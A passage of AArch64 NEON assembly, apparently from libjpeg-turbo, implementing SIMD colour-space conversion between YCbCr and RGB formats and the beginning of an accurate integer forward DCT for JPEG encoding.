st4 {v10.b, v11.b, v12.b, v13.b}[5], [RGB], 4
.elseif \size == 1
st4 {v10.b, v11.b, v12.b, v13.b}[6], [RGB], 4
.else
.error unsupported macroblock size
.endif
.elseif \bpp == 16
.if \size == 8
st1 {v25.8h}, [RGB], 16
.elseif \size == 4
st1 {v25.4h}, [RGB], 8
.elseif \size == 2
st1 {v25.h}[4], [RGB], 2
st1 {v25.h}[5], [RGB], 2
.elseif \size == 1
st1 {v25.h}[6], [RGB], 2
.else
.error unsupported macroblock size
.endif
.else
.error unsupported bpp
.endif
.endm
.macro generate_jsimd_ycc_rgb_convert_neon colorid, bpp, r_offs, rsize, \
g_offs, gsize, b_offs, bsize, \
defsize, fast_st3
/*
* 2-stage pipelined YCbCr->RGB conversion
*/
.macro do_yuv_to_rgb_stage1
uaddw v6.8h, v2.8h, v4.8b /* q3 = u - 128 */
uaddw v8.8h, v2.8h, v5.8b /* q2 = v - 128 */
smull v20.4s, v6.4h, v1.h[1] /* multiply by -11277 */
smlal v20.4s, v8.4h, v1.h[2] /* multiply by -23401 */
smull2 v22.4s, v6.8h, v1.h[1] /* multiply by -11277 */
smlal2 v22.4s, v8.8h, v1.h[2] /* multiply by -23401 */
smull v24.4s, v8.4h, v1.h[0] /* multiply by 22971 */
smull2 v26.4s, v8.8h, v1.h[0] /* multiply by 22971 */
smull v28.4s, v6.4h, v1.h[3] /* multiply by 29033 */
smull2 v30.4s, v6.8h, v1.h[3] /* multiply by 29033 */
.endm
.macro do_yuv_to_rgb_stage2
rshrn v20.4h, v20.4s, #15
rshrn2 v20.8h, v22.4s, #15
rshrn v24.4h, v24.4s, #14
rshrn2 v24.8h, v26.4s, #14
rshrn v28.4h, v28.4s, #14
rshrn2 v28.8h, v30.4s, #14
uaddw v20.8h, v20.8h, v0.8b
uaddw v24.8h, v24.8h, v0.8b
uaddw v28.8h, v28.8h, v0.8b
.if \bpp != 16
sqxtun v1\g_offs\defsize, v20.8h
sqxtun v1\r_offs\defsize, v24.8h
sqxtun v1\b_offs\defsize, v28.8h
.else
sqshlu v21.8h, v20.8h, #8
sqshlu v25.8h, v24.8h, #8
sqshlu v29.8h, v28.8h, #8
sri v25.8h, v21.8h, #5
sri v25.8h, v29.8h, #11
.endif
.endm
.macro do_yuv_to_rgb_stage2_store_load_stage1 fast_st3
rshrn v20.4h, v20.4s, #15
rshrn v24.4h, v24.4s, #14
rshrn v28.4h, v28.4s, #14
ld1 {v4.8b}, [U], 8
rshrn2 v20.8h, v22.4s, #15
rshrn2 v24.8h, v26.4s, #14
rshrn2 v28.8h, v30.4s, #14
ld1 {v5.8b}, [V], 8
uaddw v20.8h, v20.8h, v0.8b
uaddw v24.8h, v24.8h, v0.8b
uaddw v28.8h, v28.8h, v0.8b
.if \bpp != 16 /**************** rgb24/rgb32 ******************************/
sqxtun v1\g_offs\defsize, v20.8h
ld1 {v0.8b}, [Y], 8
sqxtun v1\r_offs\defsize, v24.8h
prfm pldl1keep, [U, #64]
prfm pldl1keep, [V, #64]
prfm pldl1keep, [Y, #64]
sqxtun v1\b_offs\defsize, v28.8h
uaddw v6.8h, v2.8h, v4.8b /* v6.16b = u - 128 */
uaddw v8.8h, v2.8h, v5.8b /* q2 = v - 128 */
smull v20.4s, v6.4h, v1.h[1] /* multiply by -11277 */
smlal v20.4s, v8.4h, v1.h[2] /* multiply by -23401 */
smull2 v22.4s, v6.8h, v1.h[1] /* multiply by -11277 */
smlal2 v22.4s, v8.8h, v1.h[2] /* multiply by -23401 */
smull v24.4s, v8.4h, v1.h[0] /* multiply by 22971 */
smull2 v26.4s, v8.8h, v1.h[0] /* multiply by 22971 */
.else /**************************** rgb565 ********************************/
sqshlu v21.8h, v20.8h, #8
sqshlu v25.8h, v24.8h, #8
sqshlu v29.8h, v28.8h, #8
uaddw v6.8h, v2.8h, v4.8b /* v6.16b = u - 128 */
uaddw v8.8h, v2.8h, v5.8b /* q2 = v - 128 */
ld1 {v0.8b}, [Y], 8
smull v20.4s, v6.4h, v1.h[1] /* multiply by -11277 */
smlal v20.4s, v8.4h, v1.h[2] /* multiply by -23401 */
smull2 v22.4s, v6.8h, v1.h[1] /* multiply by -11277 */
smlal2 v22.4s, v8.8h, v1.h[2] /* multiply by -23401 */
sri v25.8h, v21.8h, #5
smull v24.4s, v8.4h, v1.h[0] /* multiply by 22971 */
smull2 v26.4s, v8.8h, v1.h[0] /* multiply by 22971 */
prfm pldl1keep, [U, #64]
prfm pldl1keep, [V, #64]
prfm pldl1keep, [Y, #64]
sri v25.8h, v29.8h, #11
.endif
do_store \bpp, 8, \fast_st3
smull v28.4s, v6.4h, v1.h[3] /* multiply by 29033 */
smull2 v30.4s, v6.8h, v1.h[3] /* multiply by 29033 */
.endm
.macro do_yuv_to_rgb
do_yuv_to_rgb_stage1
do_yuv_to_rgb_stage2
.endm
.if \fast_st3 == 1
asm_function jsimd_ycc_\colorid\()_convert_neon
.else
asm_function jsimd_ycc_\colorid\()_convert_neon_slowst3
.endif
OUTPUT_WIDTH .req w0
INPUT_BUF .req x1
INPUT_ROW .req w2
OUTPUT_BUF .req x3
NUM_ROWS .req w4
INPUT_BUF0 .req x5
INPUT_BUF1 .req x6
INPUT_BUF2 .req x1
RGB .req x7
Y .req x9
U .req x10
V .req x11
N .req w15
sub sp, sp, 64
mov x9, sp
/* Load constants to d1, d2, d3 (v0.4h is just used for padding) */
get_symbol_loc x15, Ljsimd_ycc_rgb_neon_consts
/* Save Neon registers */
st1 {v8.8b, v9.8b, v10.8b, v11.8b}, [x9], 32
st1 {v12.8b, v13.8b, v14.8b, v15.8b}, [x9], 32
ld1 {v0.4h, v1.4h}, [x15], 16
ld1 {v2.8h}, [x15]
ldr INPUT_BUF0, [INPUT_BUF]
ldr INPUT_BUF1, [INPUT_BUF, #8]
ldr INPUT_BUF2, [INPUT_BUF, #16]
.unreq INPUT_BUF
/* Initially set v10, v11.4h, v12.8b, d13 to 0xFF */
movi v10.16b, #255
movi v13.16b, #255
/* Outer loop over scanlines */
cmp NUM_ROWS, #1
b.lt 9f
0:
ldr Y, [INPUT_BUF0, INPUT_ROW, uxtw #3]
ldr U, [INPUT_BUF1, INPUT_ROW, uxtw #3]
mov N, OUTPUT_WIDTH
ldr V, [INPUT_BUF2, INPUT_ROW, uxtw #3]
add INPUT_ROW, INPUT_ROW, #1
ldr RGB, [OUTPUT_BUF], #8
/* Inner loop over pixels */
subs N, N, #8
b.lt 3f
do_load 8
do_yuv_to_rgb_stage1
subs N, N, #8
b.lt 2f
1:
do_yuv_to_rgb_stage2_store_load_stage1 \fast_st3
subs N, N, #8
b.ge 1b
2:
do_yuv_to_rgb_stage2
do_store \bpp, 8, \fast_st3
tst N, #7
b.eq 8f
3:
tst N, #4
b.eq 3f
do_load 4
3:
tst N, #2
b.eq 4f
do_load 2
4:
tst N, #1
b.eq 5f
do_load 1
5:
do_yuv_to_rgb
tst N, #4
b.eq 6f
do_store \bpp, 4, \fast_st3
6:
tst N, #2
b.eq 7f
do_store \bpp, 2, \fast_st3
7:
tst N, #1
b.eq 8f
do_store \bpp, 1, \fast_st3
8:
subs NUM_ROWS, NUM_ROWS, #1
b.gt 0b
9:
/* Restore all registers and return */
ld1 {v8.8b, v9.8b, v10.8b, v11.8b}, [sp], 32
ld1 {v12.8b, v13.8b, v14.8b, v15.8b}, [sp], 32
br x30
.unreq OUTPUT_WIDTH
.unreq INPUT_ROW
.unreq OUTPUT_BUF
.unreq NUM_ROWS
.unreq INPUT_BUF0
.unreq INPUT_BUF1
.unreq INPUT_BUF2
.unreq RGB
.unreq Y
.unreq U
.unreq V
.unreq N
.purgem do_yuv_to_rgb
.purgem do_yuv_to_rgb_stage1
.purgem do_yuv_to_rgb_stage2
.purgem do_yuv_to_rgb_stage2_store_load_stage1
.endm
/*--------------------------------- id ----- bpp R rsize G gsize B bsize defsize fast_st3*/
generate_jsimd_ycc_rgb_convert_neon extrgb, 24, 0, .4h, 1, .4h, 2, .4h, .8b, 1
generate_jsimd_ycc_rgb_convert_neon extbgr, 24, 2, .4h, 1, .4h, 0, .4h, .8b, 1
generate_jsimd_ycc_rgb_convert_neon extrgbx, 32, 0, .4h, 1, .4h, 2, .4h, .8b, 1
generate_jsimd_ycc_rgb_convert_neon extbgrx, 32, 2, .4h, 1, .4h, 0, .4h, .8b, 1
generate_jsimd_ycc_rgb_convert_neon extxbgr, 32, 3, .4h, 2, .4h, 1, .4h, .8b, 1
generate_jsimd_ycc_rgb_convert_neon extxrgb, 32, 1, .4h, 2, .4h, 3, .4h, .8b, 1
generate_jsimd_ycc_rgb_convert_neon rgb565, 16, 0, .4h, 0, .4h, 0, .4h, .8b, 1
generate_jsimd_ycc_rgb_convert_neon extrgb, 24, 0, .4h, 1, .4h, 2, .4h, .8b, 0
generate_jsimd_ycc_rgb_convert_neon extbgr, 24, 2, .4h, 1, .4h, 0, .4h, .8b, 0
.purgem do_load
.purgem do_store
/*****************************************************************************/
/*
* jsimd_extrgb_ycc_convert_neon
* jsimd_extbgr_ycc_convert_neon
* jsimd_extrgbx_ycc_convert_neon
* jsimd_extbgrx_ycc_convert_neon
* jsimd_extxbgr_ycc_convert_neon
* jsimd_extxrgb_ycc_convert_neon
*
* Colorspace conversion RGB -> YCbCr
*/
.macro do_store size
.if \size == 8
st1 {v20.8b}, [Y], #8
st1 {v21.8b}, [U], #8
st1 {v22.8b}, [V], #8
.elseif \size == 4
st1 {v20.b}[0], [Y], #1
st1 {v20.b}[1], [Y], #1
st1 {v20.b}[2], [Y], #1
st1 {v20.b}[3], [Y], #1
st1 {v21.b}[0], [U], #1
st1 {v21.b}[1], [U], #1
st1 {v21.b}[2], [U], #1
st1 {v21.b}[3], [U], #1
st1 {v22.b}[0], [V], #1
st1 {v22.b}[1], [V], #1
st1 {v22.b}[2], [V], #1
st1 {v22.b}[3], [V], #1
.elseif \size == 2
st1 {v20.b}[4], [Y], #1
st1 {v20.b}[5], [Y], #1
st1 {v21.b}[4], [U], #1
st1 {v21.b}[5], [U], #1
st1 {v22.b}[4], [V], #1
st1 {v22.b}[5], [V], #1
.elseif \size == 1
st1 {v20.b}[6], [Y], #1
st1 {v21.b}[6], [U], #1
st1 {v22.b}[6], [V], #1
.else
.error unsupported macroblock size
.endif
.endm
.macro do_load bpp, size, fast_ld3
.if \bpp == 24
.if \size == 8
.if \fast_ld3 == 1
ld3 {v10.8b, v11.8b, v12.8b}, [RGB], #24
.else
ld1 {v10.b}[0], [RGB], #1
ld1 {v11.b}[0], [RGB], #1
ld1 {v12.b}[0], [RGB], #1
ld1 {v10.b}[1], [RGB], #1
ld1 {v11.b}[1], [RGB], #1
ld1 {v12.b}[1], [RGB], #1
ld1 {v10.b}[2], [RGB], #1
ld1 {v11.b}[2], [RGB], #1
ld1 {v12.b}[2], [RGB], #1
ld1 {v10.b}[3], [RGB], #1
ld1 {v11.b}[3], [RGB], #1
ld1 {v12.b}[3], [RGB], #1
ld1 {v10.b}[4], [RGB], #1
ld1 {v11.b}[4], [RGB], #1
ld1 {v12.b}[4], [RGB], #1
ld1 {v10.b}[5], [RGB], #1
ld1 {v11.b}[5], [RGB], #1
ld1 {v12.b}[5], [RGB], #1
ld1 {v10.b}[6], [RGB], #1
ld1 {v11.b}[6], [RGB], #1
ld1 {v12.b}[6], [RGB], #1
ld1 {v10.b}[7], [RGB], #1
ld1 {v11.b}[7], [RGB], #1
ld1 {v12.b}[7], [RGB], #1
.endif
prfm pldl1keep, [RGB, #128]
.elseif \size == 4
ld3 {v10.b, v11.b, v12.b}[0], [RGB], #3
ld3 {v10.b, v11.b, v12.b}[1], [RGB], #3
ld3 {v10.b, v11.b, v12.b}[2], [RGB], #3
ld3 {v10.b, v11.b, v12.b}[3], [RGB], #3
.elseif \size == 2
ld3 {v10.b, v11.b, v12.b}[4], [RGB], #3
ld3 {v10.b, v11.b, v12.b}[5], [RGB], #3
.elseif \size == 1
ld3 {v10.b, v11.b, v12.b}[6], [RGB], #3
.else
.error unsupported macroblock size
.endif
.elseif \bpp == 32
.if \size == 8
ld4 {v10.8b, v11.8b, v12.8b, v13.8b}, [RGB], #32
prfm pldl1keep, [RGB, #128]
.elseif \size == 4
ld4 {v10.b, v11.b, v12.b, v13.b}[0], [RGB], #4
ld4 {v10.b, v11.b, v12.b, v13.b}[1], [RGB], #4
ld4 {v10.b, v11.b, v12.b, v13.b}[2], [RGB], #4
ld4 {v10.b, v11.b, v12.b, v13.b}[3], [RGB], #4
.elseif \size == 2
ld4 {v10.b, v11.b, v12.b, v13.b}[4], [RGB], #4
ld4 {v10.b, v11.b, v12.b, v13.b}[5], [RGB], #4
.elseif \size == 1
ld4 {v10.b, v11.b, v12.b, v13.b}[6], [RGB], #4
.else
.error unsupported macroblock size
.endif
.else
.error unsupported bpp
.endif
.endm
.macro generate_jsimd_rgb_ycc_convert_neon colorid, bpp, r_offs, g_offs, \
b_offs, fast_ld3
/*
* 2-stage pipelined RGB->YCbCr conversion
*/
.macro do_rgb_to_yuv_stage1
ushll v4.8h, v1\r_offs\().8b, #0 /* r = v4 */
ushll v6.8h, v1\g_offs\().8b, #0 /* g = v6 */
ushll v8.8h, v1\b_offs\().8b, #0 /* b = v8 */
rev64 v18.4s, v1.4s
rev64 v26.4s, v1.4s
rev64 v28.4s, v1.4s
rev64 v30.4s, v1.4s
umull v14.4s, v4.4h, v0.h[0]
umull2 v16.4s, v4.8h, v0.h[0]
umlsl v18.4s, v4.4h, v0.h[3]
umlsl2 v26.4s, v4.8h, v0.h[3]
umlal v28.4s, v4.4h, v0.h[5]
umlal2 v30.4s, v4.8h, v0.h[5]
umlal v14.4s, v6.4h, v0.h[1]
umlal2 v16.4s, v6.8h, v0.h[1]
umlsl v18.4s, v6.4h, v0.h[4]
umlsl2 v26.4s, v6.8h, v0.h[4]
umlsl v28.4s, v6.4h, v0.h[6]
umlsl2 v30.4s, v6.8h, v0.h[6]
umlal v14.4s, v8.4h, v0.h[2]
umlal2 v16.4s, v8.8h, v0.h[2]
umlal v18.4s, v8.4h, v0.h[5]
umlal2 v26.4s, v8.8h, v0.h[5]
umlsl v28.4s, v8.4h, v0.h[7]
umlsl2 v30.4s, v8.8h, v0.h[7]
.endm
.macro do_rgb_to_yuv_stage2
rshrn v20.4h, v14.4s, #16
shrn v22.4h, v18.4s, #16
shrn v24.4h, v28.4s, #16
rshrn2 v20.8h, v16.4s, #16
shrn2 v22.8h, v26.4s, #16
shrn2 v24.8h, v30.4s, #16
xtn v20.8b, v20.8h /* v20 = y */
xtn v21.8b, v22.8h /* v21 = u */
xtn v22.8b, v24.8h /* v22 = v */
.endm
.macro do_rgb_to_yuv
do_rgb_to_yuv_stage1
do_rgb_to_yuv_stage2
.endm
/* TODO: expand macros and interleave instructions if some in-order
* AArch64 processor actually can dual-issue LOAD/STORE with ALU */
.macro do_rgb_to_yuv_stage2_store_load_stage1 fast_ld3
do_rgb_to_yuv_stage2
do_load \bpp, 8, \fast_ld3
st1 {v20.8b}, [Y], #8
st1 {v21.8b}, [U], #8
st1 {v22.8b}, [V], #8
do_rgb_to_yuv_stage1
.endm
.if \fast_ld3 == 1
asm_function jsimd_\colorid\()_ycc_convert_neon
.else
asm_function jsimd_\colorid\()_ycc_convert_neon_slowld3
.endif
OUTPUT_WIDTH .req w0
INPUT_BUF .req x1
OUTPUT_BUF .req x2
OUTPUT_ROW .req w3
NUM_ROWS .req w4
OUTPUT_BUF0 .req x5
OUTPUT_BUF1 .req x6
OUTPUT_BUF2 .req x2 /* OUTPUT_BUF */
RGB .req x7
Y .req x9
U .req x10
V .req x11
N .req w12
/* Load constants to d0, d1, d2, d3 */
get_symbol_loc x13, Ljsimd_rgb_ycc_neon_consts
ld1 {v0.8h, v1.8h}, [x13]
ldr OUTPUT_BUF0, [OUTPUT_BUF]
ldr OUTPUT_BUF1, [OUTPUT_BUF, #8]
ldr OUTPUT_BUF2, [OUTPUT_BUF, #16]
.unreq OUTPUT_BUF
/* Save Neon registers */
sub sp, sp, #64
mov x9, sp
st1 {v8.8b, v9.8b, v10.8b, v11.8b}, [x9], 32
st1 {v12.8b, v13.8b, v14.8b, v15.8b}, [x9], 32
/* Outer loop over scanlines */
cmp NUM_ROWS, #1
b.lt 9f
0:
ldr Y, [OUTPUT_BUF0, OUTPUT_ROW, uxtw #3]
ldr U, [OUTPUT_BUF1, OUTPUT_ROW, uxtw #3]
mov N, OUTPUT_WIDTH
ldr V, [OUTPUT_BUF2, OUTPUT_ROW, uxtw #3]
add OUTPUT_ROW, OUTPUT_ROW, #1
ldr RGB, [INPUT_BUF], #8
/* Inner loop over pixels */
subs N, N, #8
b.lt 3f
do_load \bpp, 8, \fast_ld3
do_rgb_to_yuv_stage1
subs N, N, #8
b.lt 2f
1:
do_rgb_to_yuv_stage2_store_load_stage1 \fast_ld3
subs N, N, #8
b.ge 1b
2:
do_rgb_to_yuv_stage2
do_store 8
tst N, #7
b.eq 8f
3:
tbz N, #2, 3f
do_load \bpp, 4, \fast_ld3
3:
tbz N, #1, 4f
do_load \bpp, 2, \fast_ld3
4:
tbz N, #0, 5f
do_load \bpp, 1, \fast_ld3
5:
do_rgb_to_yuv
tbz N, #2, 6f
do_store 4
6:
tbz N, #1, 7f
do_store 2
7:
tbz N, #0, 8f
do_store 1
8:
subs NUM_ROWS, NUM_ROWS, #1
b.gt 0b
9:
/* Restore all registers and return */
ld1 {v8.8b, v9.8b, v10.8b, v11.8b}, [sp], 32
ld1 {v12.8b, v13.8b, v14.8b, v15.8b}, [sp], 32
br x30
.unreq OUTPUT_WIDTH
.unreq OUTPUT_ROW
.unreq INPUT_BUF
.unreq NUM_ROWS
.unreq OUTPUT_BUF0
.unreq OUTPUT_BUF1
.unreq OUTPUT_BUF2
.unreq RGB
.unreq Y
.unreq U
.unreq V
.unreq N
.purgem do_rgb_to_yuv
.purgem do_rgb_to_yuv_stage1
.purgem do_rgb_to_yuv_stage2
.purgem do_rgb_to_yuv_stage2_store_load_stage1
.endm
/*--------------------------------- id ----- bpp R G B Fast LD3 */
generate_jsimd_rgb_ycc_convert_neon extrgb, 24, 0, 1, 2, 1
generate_jsimd_rgb_ycc_convert_neon extbgr, 24, 2, 1, 0, 1
generate_jsimd_rgb_ycc_convert_neon extrgbx, 32, 0, 1, 2, 1
generate_jsimd_rgb_ycc_convert_neon extbgrx, 32, 2, 1, 0, 1
generate_jsimd_rgb_ycc_convert_neon extxbgr, 32, 3, 2, 1, 1
generate_jsimd_rgb_ycc_convert_neon extxrgb, 32, 1, 2, 3, 1
generate_jsimd_rgb_ycc_convert_neon extrgb, 24, 0, 1, 2, 0
generate_jsimd_rgb_ycc_convert_neon extbgr, 24, 2, 1, 0, 0
.purgem do_load
.purgem do_store
/*****************************************************************************/
/*
* jsimd_fdct_islow_neon
*
* This file contains a slower but more accurate integer implementation of the
* forward DCT (Discrete Cosine Transform). The following code is based
* directly on the IJG''s original jfdctint.c; see the jfdctint.c for
* more details.
*
* TODO: can be combined with 'jsimd_convsamp_neon' to get
* rid of a bunch of VLD1.16 instructions
*/
#define CONST_BITS 13
#define PASS1_BITS 2
#define DESCALE_P1 (CONST_BITS - PASS1_BITS)
#define DESCALE_P2 (CONST_BITS + PASS1_BITS)
#define XFIX_P_0_298 v0.h[0]
#define XFIX_N_0_390 v0.h[1]
#define XFIX_P_0_541 v0.h[2]
#define XFIX_P_0_765 v0.h[3]
#define XFIX_N_0_899 v0.h[4]
#define XFIX_P_1_175 v0.h[5]
#define XFIX_P_1_501 v0.h[6]
#define XFIX_N_1_847 v0.h[7]
#define XFIX_N_1_961 v1.h[0]
#define XFIX_P_2_053 v1.h[1]
#define XFIX_N_2_562 v1.h[2]
#define XFIX_P_3_072 v1.h[3]
asm_function jsimd_fdct_islow_neon
DATA .req x0
TMP .req x9
/* Load constants */
get_symbol_loc TMP, Ljsimd_fdct_islow_neon_consts
ld1 {v0.8h, v1.8h}, [TMP]
/* Save Neon registers */
sub sp, sp, #64
mov x10, sp
st1 {v8.8b, v9.8b, v10.8b, v11.8b}, [x10], 32
st1 {v12.8b, v13.8b, v14.8b, v15.8b}, [x10], 32
/* Load all DATA into Neon registers with the following allocation:
* 0 1 2 3 | 4 5 6 7
* ---------+--------
* 0 | d16 | d17 | v16.8h
* 1 | d18 | d19 | v17.8h
* 2 | d20 | d21 | v18.8h
* 3 | d22 | d23 | v19.8h
* 4 | d24 | d25 | v20.8h
* 5 | d26 | d27 | v21.8h
* 6 | d28 | d29 | v22.8h
* 7 | d30 | d31 | v23.8h
*/
ld1 {v16.8h, v17.8h, v18.8h, v19.8h}, [DATA], 64
ld1 {v20.8h, v21.8h, v22.8h, v23.8h}, [DATA]
sub DATA, DATA, #64
/* Transpose */
transpose_8x8 v16, v17, v18, v19, v20, v21, v22, v23, v31, v2, v3, v4
/* 1-D FDCT */
add v24.8h, v16.8h, v23.8h /* tmp0 = dataptr[0] + dataptr[7]; */
sub v31.8h, v16.8h, v23.8h /* tmp7 = dataptr[0] - dataptr[7]; */
add v25.8h, v17.8h, v22.8h /* tmp1 = dataptr[1] + dataptr[6]; */
sub v30.8h, v17.8h, v22.8h /* tmp6 = dataptr[1] - dataptr[6]; */
add v26.8h, v18.8h, v21.8h /* tmp2 = dataptr[2] + dataptr[5]; */
sub v29.8h, v18.8h, v21.8h /* tmp5 = dataptr[2] - dataptr[5]; */
add v27.8h, v19.8h, v20.8h /* tmp3 = dataptr[3] + dataptr[4]; */
sub v28.8h, v19.8h, v20.8h /* tmp4 = dataptr[3] - dataptr[4]; */
/* even part */
add v8.8h, v24.8h, v27.8h /* tmp10 = tmp0 + tmp3; */
sub v9.8h, v24.8h, v27.8h /* tmp13 = tmp0 - tmp3; */
add v10.8h, v25.8h, v26.8h /* tmp11 = tmp1 + tmp2; */
sub v11.8h, v25.8h, v26.8h /* tmp12 = tmp1 - tmp2; */
add v16.8h, v8.8h, v10.8h /* tmp10 + tmp11 */
sub v20.8h, v8.8h, v10.8h /* tmp10 - tmp11 */
add v18.8h, v11.8h, v9.8h /* tmp12 + tmp13 */
shl v16.8h, v16.8h, #PASS1_BITS /* dataptr[0] = (DCTELEM)LEFT_SHIFT(tmp10 + tmp11, PASS1_BITS); */
shl v20.8h, v20.8h, #PASS1_BITS /* dataptr[4] = (DCTELEM)LEFT_SHIFT(tmp10 - tmp11, PASS1_BITS); */
smull2 v24.4s, v18.8h, XFIX_P_0_541 /* z1 hi = MULTIPLY(tmp12 + tmp13, XFIX_P_0_541); */
smull v18.4s, v18.4h, XFIX_P_0_541 /* z1 lo = MULTIPLY(tmp12 + tmp13, XFIX_P_0_541); */
mov v22.16b, v18.16b
mov v25.16b, v24.16b
smlal v18.4s, v9.4h, XFIX_P_0_765 /* lo z1 + MULTIPLY(tmp13, XFIX_P_0_765) */
smlal2 v24.4s, v9.8h, XFIX_P_0_765 /* hi z1 + MULTIPLY(tmp13, XFIX_P_0_765) */
smlal v22.4s, v11.4h, XFIX_N_1_847 /* lo z1 + MULTIPLY(tmp12, XFIX_N_1_847) */
smlal2 v25.4s, v11.8h, XFIX_N_1_847 /* hi z1 + MULTIPLY(tmp12, XFIX_N_1_847) */
rshrn v18.4h, v18.4s, #DESCALE_P1
rshrn v22.4h, v22.4s, #DESCALE_P1
rshrn2 v18.8h, v24.4s, #DESCALE_P1 /* dataptr[2] = (DCTELEM)DESCALE(z1 + MULTIPLY(tmp13, XFIX_P_0_765), CONST_BITS-PASS1_BITS); */
rshrn2 v22.8h, v25.4s, #DESCALE_P1 /* dataptr[6] = (DCTELEM)DESCALE(z1 + MULTIPLY(tmp12, XFIX_N_1_847), CONST_BITS-PASS1_BITS); */
/* Odd part */
add v8.8h, v28.8h, v31.8h /* z1 = tmp4 + tmp7; */
add v9.8h, v29.8h, v30.8h /* z2 = tmp5 + tmp6; */
add v10.8h, v28.8h, v30.8h /* z3 = tmp4 + tmp6; */
add v11.8h, v29.8h, v31.8h /* z4 = tmp5 + tmp7; */
smull v4.4s, v10.4h, XFIX_P_1_175 /* z5 lo = z3 lo * XFIX_P_1_175 */
smull2 v5.4s, v10.8h, XFIX_P_1_175
smlal v4.4s, v11.4h, XFIX_P_1_175 /* z5 = MULTIPLY(z3 + z4, FIX_1_175875602); */
smlal2 v5.4s, v11.8h, XFIX_P_1_175
smull2 v24.4s, v28.8h, XFIX_P_0_298
smull2 v25.4s, v29.8h, XFIX_P_2_053
smull2 v26.4s, v30.8h, XFIX_P_3_072
smull2 v27.4s, v31.8h, XFIX_P_1_501
smull v28.4s, v28.4h, XFIX_P_0_298 /* tmp4 = MULTIPLY(tmp4, FIX_0_298631336); */
smull v29.4s, v29.4h, XFIX_P_2_053 /* tmp5 = MULTIPLY(tmp5, FIX_2_053119869); */
smull v30.4s, v30.4h, XFIX_P_3_072 /* tmp6 = MULTIPLY(tmp6, FIX_3_072711026); */
smull v31.4s, v31.4h, XFIX_P_1_501 /* tmp7 = MULTIPLY(tmp7, FIX_1_501321110); */
smull2 v12.4s, v8.8h, XFIX_N_0_899
smull2 v13.4s, v9.8h, XFIX_N_2_562
smull2 v14.4s, v10.8h, XFIX_N_1_961
smull2 v15.4s, v11.8h, XFIX_N_0_390
smull v8.4s, v8.4h, XFIX_N_0_899 /* z1 = MULTIPLY(z1, -FIX_0_899976223); */
smull v9.4s, v9.4h, XFIX_N_2_562 /* z2 = MULTIPLY(z2, -FIX_2_562915447); */
smull v10.4s, v10.4h, XFIX_N_1_961 /* z3 = MULTIPLY(z3, -FIX_1_961570560); */
smull v11.4s, v11.4h, XFIX_N_0_390 /* z4 = MULTIPLY(z4, -FIX_0_390180644); */
add v10.4s, v10.4s, v4.4s /* z3 += z5 */
add v14.4s, v14.4s, v5.4s
add v11.4s, v11.4s, v4.4s /* z4 += z5 */
add v15.4s, v15.4s, v5.4s
add v28.4s, v28.4s, v8.4s /* tmp4 += z1 */
add v24.4s, v24.4s, v12.4s
add v29.4s, v29.4s, v9.4s /* tmp5 += z2 */
add v25.4s, v25.4s, v13.4s
add v30.4s, v30.4s, v10.4s /* tmp6 += z3 */
add v26.4s, v26.4s, v14.4s
add v31.4s, v31.4s, v11.4s /* tmp7 += z4 */
add v27.4s, v27.4s, v15.4s
add v28.4s, v28.4s, v10.4s /* tmp4 += z3 */
add v24.4s, v24.4s, v14.4s
add v29.4s, v29.4s, v11.4s /* tmp5 += z4 */
add v25.4s, v25.4s, v15.4s
add v30.4s, v30.4s, v9.4s /* tmp6 += z2 */
add v26.4s, v26.4s, v13.4s
add v31.4s, v31.4s, v8.4s /* tmp7 += z1 */
add v27.4s, v27.4s, v12.4s
rshrn v23.4h, v28.4s, #DESCALE_P1
rshrn v21.4h, v29.4s, #DESCALE_P1
rshrn v19.4h, v30.4s, #DESCALE_P1
rshrn v17.4h, v31.4s, #DESCALE_P1
rshrn2 v23.8h, v24.4s, #DESCALE_P1 /* dataptr[7] = (DCTELEM)DESCALE(tmp4 + z1 + z3, CONST_BITS-PASS1_BITS); */
rshrn2 v21.8h, v25.4s, #DESCALE_P1 /* dataptr[5] = (DCTELEM)DESCALE(tmp5 + z2 + z4, CONST_BITS-PASS1_BITS); */
rshrn2 v19.8h, v26.4s, #DESCALE_P1 /* dataptr[3] = (DCTELEM)DESCALE(tmp6 + z2 + z3, CONST_BITS-PASS1_BITS); */
rshrn2 v17.8h, v27.4s, #DESCALE_P1 /* dataptr[1] = (DCTELEM)DESCALE(tmp7 + z1 + z4, CONST_BITS-PASS1_BITS); */
/* Transpose */
transpose_8x8 v16, v17, v18, v19, v20, v21, v22, v23, v31, v2, v3, v4
/* 1-D FDCT */
add v24.8h, v16.8h, v23.8h /* tmp0 = dataptr[0] + dataptr[7]; */
sub v31.8h, v16.8h, v23.8h /* tmp7 = dataptr[0] - dataptr[7]; */
add v25.8h, v17.8h, v22.8h /* tmp1 = dataptr[1] + dataptr[6]; */
sub v30.8h, v17.8h, v22.8h /* tmp6 = dataptr[1] - dataptr[6]; */
add v26.8h, v18.8h, v21.8h /* tmp2 = dataptr[2] + dataptr[5]; */
sub v29.8h, v18.8h, v21.8h /* tmp5 = dataptr[2] - dataptr[5]; */
add v27.8h, v19.8h, v20.8h /* tmp3 = dataptr[3] + dataptr[4]; */
sub v28.8h, v19.8h, v20.8h /* tmp4 = dataptr[3] - dataptr[4]; */
/* even part */
add v8.8h, v24.8h, v27.8h /* tmp10 = tmp0 + tmp3; */
sub v9.8h, v24.8h, v27.8h /* tmp13 = tmp0 - tmp3; */
add v10.8h, v25.8h, v26.8h /* tmp11 = tmp1 + tmp2; */
sub v11.8h, v25.8h, v26.8h /* tmp12 = tmp1 - tmp2; */
add v16.8h, v8.8h, v10.8h /* tmp10 + tmp11 */
sub v20.8h, v8.8h, v10.8h /* tmp10 - tmp11 */
add v18.8h, v11.8h, v9.8h /* tmp12 + tmp13 */
srshr v16.8h, v16.8h, #PASS1_BITS /* dataptr[0] = (DCTELEM)DESCALE(tmp10 + tmp11, PASS1_BITS); */
srshr v20.8h, v20.8h, #PASS1_BITS /* dataptr[4] = (DCTELEM)DESCALE(tmp10 - tmp11, PASS1_BITS); */
smull2 v24.4s, v18.8h, XFIX_P_0_541 /* z1 hi = MULTIPLY(tmp12 + tmp13, XFIX_P_0_541); */
smull v18.4s, v18.4h, XFIX_P_0_541 /* z1 lo = MULTIPLY(tmp12 + tmp13, XFIX_P_0_541); */
mov v22.16b, v18.16b
mov v25.16b, v24.16b
smlal v18.4s, v9.4h, XFIX_P_0_765 /* lo z1 + MULTIPLY(tmp13, XFIX_P_0_765) */
smlal2 v24.4s, v9.8h, XFIX_P_0_765 /* hi z1 + MULTIPLY(tmp13, XFIX_P_0_765) */
